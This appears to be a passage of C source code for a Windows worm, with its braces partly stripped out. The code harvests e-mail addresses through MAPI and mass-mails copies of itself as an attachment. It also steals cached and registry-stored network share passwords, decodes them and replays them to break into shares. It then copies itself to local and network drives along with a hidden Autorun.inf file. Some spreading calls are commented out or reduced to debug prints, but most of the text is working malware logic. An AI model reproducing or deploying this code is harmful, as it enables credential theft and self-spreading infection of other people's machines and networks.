        s_send = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
            if( s_recv == INVALID_SOCKET || s_send == INVALID_SOCKET )
                printf("WormThread: invalid socket\n");
                goto endThread;

        memset( &saddr_in, 0x00, sizeof( struct sockaddr));

        memset( &saddr, 0x00, sizeof( struct sockaddr));
        saddr.sin_family = AF_INET;
        saddr.sin_port = htons( WORMGAME_PORT );
        saddr.sin_addr.s_addr = INADDR_ANY;

        memset( &saddr_out, 0x00, sizeof( struct sockaddr) );
        saddr_out.sin_family = AF_INET;
        saddr_out.sin_port = htons( WORMGAME_PORT );
        saddr_out.sin_addr.s_addr = INADDR_BROADCAST;

        optval = 1;
            if( setsockopt( s_send, SOL_SOCKET, SO_BROADCAST , (char*)&optval, sizeof( int) ) == SOCKET_ERROR )
                printf("WormThread: setsocketopt failed\n");
                goto endThread;

            if( bind( s_recv, (struct sockaddr*)&saddr, sizeof( struct sockaddr)) == SOCKET_ERROR )
                printf("WormThread: bind failed\n");
                goto endThread;

        FD_ZERO( &fd_read );
        FD_SET( s_recv, &fd_read );
        while( 1 )
               if( totalwins >= WORMGAME_MAX_WINS )
                    totalwins = 0;
            // pick a magic number...
            magicWorm = ( ( rand() % 100 ) + 1 );
            printf("WormThread: picked a magic num: %d\n", magicWorm);
            // wait a length of time...
            Sleep( 500 );
            // send my magic number...
            gamePkt.pktType = WORMGAME_PKT_PLAY;
            gamePkt.pktNum = magicWorm;
                if( sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size) == SOCKET_ERROR )
                    printf("WormThread: sendto failed\n");

            // handel responces...
                while( select( 0, &fd_read, NULL, NULL, &timeout) != SOCKET_ERROR )
                    if( recvfrom( s_recv, (char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_in, &size) == SOCKET_ERROR )
                        printf("WormThread: recvfrom failed\n");
                    } else {
                        switch( gamePkt.pktType )
                            case WORMGAME_PKT_PLAY: // recieved a magic number...
                                // ignore responce from local machine...
                                printf("WormThread: recieved a magic num: %d\n", gamePkt.pktNum);
                                // process other responces
                                    if( gamePkt.pktNum == magicWorm )
                                        // notify any winners
                                        gamePkt.pktType = WORMGAME_PKT_WIN;
                                        saddr_out.sin_addr.s_addr = saddr_in.sin_addr.s_addr;
                                        sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size);
                                        saddr_out.sin_addr.s_addr = INADDR_BROADCAST;
                            case WORMGAME_PKT_WIN: // im a winner :)
                                printf("WormThread: IM A WINNER!!!\n");
                                goto loop;
                            default:   // its all gone bugfuck!
                                printf("WormThread: its all gone bugfuck!\n");
                } // while(select...
        closesocket( s_recv );
        closesocket( s_send );
        ExitThread( 0 );
        return 0;
BOOL runningNT()
        OSVERSIONINFO osvi;
        BOOL retval = FALSE;

        osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
            switch( osvi.dwPlatformId )
                case VER_PLATFORM_WIN32_NT:
                    retval = TRUE;
                case VER_PLATFORM_WIN32_WINDOWS:
                    retval = FALSE;
                    retval = FALSE;
        return retval;
void propogateMAPI( void )
        LHANDLE lhSession;
        CHAR rgchMsgID[513];
        MapiMessage *lpMessage;
        int i=0;
            if( initMAPI() != 0 )
            if( MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)
                *rgchMsgID = NULL;
                    while( i < MAX_RECIEVERS )
                        if( MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS)
                        if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)
                    //    printf("DOING: %s\n\t%s\n",lpMessage->lpOriginator->lpszAddress,lpMessage->lpRecips->lpszAddress);
                            if( validAddress( lpMessage->lpOriginator->lpszAddress ) == 0 )
                                strcpy( addressList[i], lpMessage->lpOriginator->lpszAddress);
                            if( validAddress( lpMessage->lpRecips->lpszAddress  ) == 0 )
                                strcpy( addressList[i], lpMessage->lpRecips->lpszAddress);

                MAPIFreeBuffer( lpMessage );

                // TO DO: sort addressList and remove duplicates...

                //sendMessage( i, lhSession );    // <---- !!!!!!

                MAPILogoff( lhSession, 0L, 0L, 0L);
            for( int x = 0 ; x < i ; x++ )
                printf("DEBUG: attacking:\t%s\n", addressList[x]);
int initMAPI( void )
        HINSTANCE hi;
        hi = LoadLibrary( "mapi32.dll" );
            if( hi == NULL )
                return -1;
        MAPILogon = (LPMAPILOGON)GetProcAddress( hi, "MAPILogon");
        MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, "MAPIFindNext");
        MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, "MAPIReadMail");
        MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, "MAPISendMail");
            if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL || MAPISendMail == NULL )
                return -1;
        return 0;
int validAddress( char * addr )
        if( strlen( addr ) >= MAX_LENGTH || strlen( addr ) == 0)
            return -1;
        } else if( strchr( addr , '@') == NULL )
            return -1;
        } else if( strchr( addr , '.') == NULL )
            return -1;
        } else {
            return 0;
int sendMessage( int recipNum, LHANDLE lhSession )
        MapiRecipDesc *recips  = (MapiRecipDesc *)malloc( recipNum*sizeof(MapiRecipDesc) );
        MapiFileDesc attachment = { 0, 0, (ULONG)-1, ptrEgo, EARTH_WORM_JIM, NULL};
            for( int i=0 ; i<recipNum ; i++ )
                recips[i].ulReserved   = 0;
                recips[i].ulRecipClass = MAPI_TO;
                recips[i].lpszName     = addressList[i];
                recips[i].lpszAddress  = addressList[i];
                recips[i].ulEIDSize    = 0;
                recips[i].lpEntryID    = NULL;
        MapiMessage note = { 0, "The Subjext", "The Message Text", NULL, NULL, NULL, 0, NULL, recipNum, recips, 1, &attachment};
            if( MAPISendMail( lhSession, 0L, &note, 0L, 0L) != SUCCESS_SUCCESS )
                return -1;
        free( recips );
        return 0;
        memmove(buf, x->abResource+x->cbResource, x->cbPassword);
        buf[x->cbPassword] = 0;
        addPassword( buf );
        return 0;
int getCachedPasswords( void )
        buf = new char[1024];
        HINSTANCE hi = LoadLibrary("mpr.dll");
            if( hi == NULL )
                return -1;
        WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) = (WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords");
            if( enp == NULL )
                return -1;
        enp( 0, 0, 0xff, pce, 0);
        FreeLibrary( hi );
        return 0;
BYTE rotr( BYTE b )
        BYTE carry;
        carry = b & 0x01;
        carry <<= 7;
        b >>= 1;
        b |= carry;
        return b;
void decodePW( char * pw )
        BYTE hash = 0x35;
            while( pw && *pw )
                *pw = *pw ^ hash;
                hash = rotr( hash );
int addPassword( char * pwd )
            if( (strlen(pwd) > 0) && (strlen(pwd) < MAX_LENGTH) )
                strcpy( passwordList[ index ], pwd);
                printf("DEBUG: ADDED: %s\n", passwordList[ index ]);
        return 0;
int getSharePasswords( void ){
        if( runningNT() == FALSE )
            HKEY key, subkey;
            DWORD i, maxKeys, len, junk;
            char keyName[256], wrightPwd[256], readPwd[256];
            RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan", 0, NULL, &key);
            RegQueryInfoKey (key, NULL, NULL, NULL, &maxKeys, NULL, NULL,NULL, NULL, NULL, NULL, NULL);
                if( maxKeys != 0 )
                    for( i=0; i<maxKeys; i++ )
                        RegEnumKey(key, i, keyName, 256);
                        RegOpenKeyEx(key, keyName, 0, NULL, &subkey);
                        wrightPwd[0] = readPwd[0] = 0;

                        len = 256;
                        RegQueryValueEx(subkey, "Parm1enc", NULL, &junk, (BYTE *)wrightPwd, &len);
                        wrightPwd[len] = 0;
                        addPassword( wrightPwd );

                        len = 256;
                        RegQueryValueEx(subkey, "Parm2enc", NULL, &junk, (BYTE *)readPwd, &len);
                        readPwd[len] = 0;
                        addPassword( readPwd );
        return 0;
void propogateDrive( void )
        int length;
        char buff[MAX_LENGTH], *ptr;

        ptr = buff;
        length = GetLogicalDriveStrings( MAX_LENGTH, ptr) ;

        if( length > 0 && length < MAX_LENGTH)
            for( int i=0 ; i<=(length/4) ; i++ )
                    switch( GetDriveType( ptr ) )
                        case DRIVE_FIXED:
                            // The drive is a local drive.
                            printf("DRIVE_FIXED: %s\n", ptr);
                            attackDrive( ptr, 1 );
                        case DRIVE_REMOTE:
                            // The drive is a network drive.
                            printf("DRIVE_REMOTE: %s\n", ptr);
                            attackDrive( ptr, 1 );
void attackDrive( char * drive, int type )
        FILE *fpAutorun;
        char buff[MAX_LENGTH];
        // copy worm to drive, Attribute = hidden
            if( type == 1 )
                sprintf( buff, "%s%s", drive, EARTH_WORM_JIM);
            } else {
                sprintf( buff, "%s\\%s", drive, EARTH_WORM_JIM);
        printf("DEBUG: propogateDrive: attacking %s\nATTACK REMOTE: %s\n", drive, buff);
        /*    if( CopyFile( ptrEgo, buff, FALSE) == TRUE && type == 1 )
                // create an Autorun.inf file on drive, Attribute = hidden
                sprintf( buff, "%sAutorun.inf", drive);
                fpAutorun = fopen(buff, "w");
                    if( fpAutorun != NULL )
                        fprintf( fpAutorun, "[Autorun]\nOPEN=%s\n", EARTH_WORM_JIM);
                        fclose( fpAutorun );
                        _rtl_chmod(buff, 1, FA_HIDDEN | FA_RDONLY);
            }   */
void propogateNet( LPNETRESOURCE lpnr )
        DWORD dwResult, dwResultEnum, cbBuffer = 16384, cEntries = 0xFFFFFFFF;
        HANDLE hEnum;
        LPNETRESOURCE lpnrLocal;
        dwResult = WNetOpenEnum( RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, lpnr, &hEnum);
            if( dwResult != NO_ERROR )
                lpnrLocal = (LPNETRESOURCE) GlobalAlloc(GPTR, cbBuffer);
                dwResultEnum = WNetEnumResource(hEnum, &cEntries, lpnrLocal, &cbBuffer);
                    if ( dwResultEnum == NO_ERROR )
                        for( DWORD i = 0; i < cEntries; i++ )
                                if( RESOURCEUSAGE_CONTAINER == ( lpnrLocal[i].dwUsage & RESOURCEUSAGE_CONTAINER ) )
                                    propogateNet( &lpnrLocal[i] );
                                } else if( RESOURCETYPE_DISK  == ( lpnrLocal[i].dwUsage & RESOURCETYPE_DISK ) )
                                    if( WNetAddConnection( lpnrLocal[ i ].lpRemoteName, NULL, NULL) == ERROR_INVALID_PASSWORD )
                                        // try all found password/username combinations...
                                        printf("ERROR_INVALID_PASSWORD "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );
                                            if( crackNetShare( lpnrLocal[ i ].lpRemoteName ) == 0 )
                                                attackDrive( lpnrLocal[i].lpRemoteName, 0 );
                                                WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
                                    } else {
                                        attackDrive( lpnrLocal[i].lpRemoteName, 0 );
                                        WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
                                        printf("ACCESS NOT DENIED "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );
                    } else if( dwResultEnum != ERROR_NO_MORE_ITEMS ) {
            } while( dwResultEnum != ERROR_NO_MORE_ITEMS );
        GlobalFree( (HGLOBAL) lpnrLocal );
        WNetCloseEnum( hEnum );
int crackNetShare( char * share )
        int retval = 0;
            for( int i=0 ; i<index ; i++ )
                retval = WNetAddConnection( share , passwordList[i], NULL );
                if( retval == NO_ERROR && retval != ERROR_INVALID_PASSWORD )   // <----- !!! dodgy testing, fix it
                    printf("PASS CRACKED: %s : %s\n", share , passwordList[i]);
                    return 0;
        return -1;
void releasePayload()
        printf("\n\t!!! PAYLOAD !!!\n");


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